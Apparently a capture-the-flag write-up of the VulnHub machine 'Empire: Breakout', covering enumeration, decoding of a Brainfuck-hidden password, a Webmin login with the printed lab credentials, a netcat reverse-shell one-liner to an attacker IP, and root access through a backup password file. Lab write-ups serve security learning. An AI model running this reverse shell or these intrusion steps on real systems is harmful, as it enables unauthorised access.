Beri Contraster

Empire: Breakout writeup




Name: "Empire: Breakout"

Release date: 21 Oct 2021

Series: Empire

Difficulty: Easy


Welcome, reader. Today we'll pwn Empire: Breakout from VulnHub. Let's start with an Nmap scan.



User

I didn't find anything interesting on the web. Let's run enum4linux.



I found a username, 'cyber'. Looking through the page source, I found a text encrypted with the brainfuck algorithm.


<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->

This can be decrypted using this. After getting the clear-text credentials, I logged into the Webmin admin panel on port 20000.

cyber:.2uqPEfj3D<P'a-3
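The comment quoted above is Brainfuck source code, so anyone who can view the page can simply run it. As an added example (not part of the original writeup), this small checker pulls Brainfuck-looking lines out of HTML comments and executes them, reproducing the password shown above; the function names and the 20-character threshold are this example's own assumptions.

```python
import re

# Page source exactly as quoted in the writeup above.
PAGE_SOURCE = """<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->"""

# A line made only of Brainfuck operators (length threshold is an assumption).
BF_LINE = re.compile(r"^[+\-<>\[\].,]{20,}$")

def run_brainfuck(program, max_steps=100_000):
    """Interpret a Brainfuck program (no input) and return what it prints."""
    jumps, stack = {}, []
    for i, op in enumerate(program):  # pre-match brackets for loop jumps
        if op == "[":
            stack.append(i)
        elif op == "]":
            j = stack.pop()  # IndexError here means an unbalanced ']'
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):  # step cap: untrusted input may loop forever
        if pc >= len(program):
            return "".join(out)
        op = program[pc]
        if op in "+-":
            tape[ptr] = (tape[ptr] + (1 if op == "+" else -1)) % 256
        elif op in "<>":
            ptr = (ptr + (1 if op == ">" else -1)) % len(tape)
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif (op == "[" and tape[ptr] == 0) or (op == "]" and tape[ptr] != 0):
            pc = jumps[pc]
        pc += 1
    raise RuntimeError("step limit exceeded")

def decode_comments(html):
    """Return the output of every Brainfuck line found inside HTML comments."""
    lines = (l.strip() for c in re.findall(r"<!--(.*?)-->", html, re.S)
             for l in c.splitlines())
    return [run_brainfuck(l) for l in lines if BF_LINE.match(l)]

if __name__ == "__main__":
    print(decode_comments(PAGE_SOURCE))
```
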

After logging into Webmin as cyber, I used the terminal to get a reverse shell and upgraded it (Shell upgrade).


Shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.10.6 4444 >/tmp/f

Root

I found tar in the home directory of cyber, which got my attention.



I tried reading .old_pass.bak, which I found during enumeration. This file had a password in it.



I tried this password for root and it worked.

Thanks for reading. If you have any questions, please don't hesitate to ask.



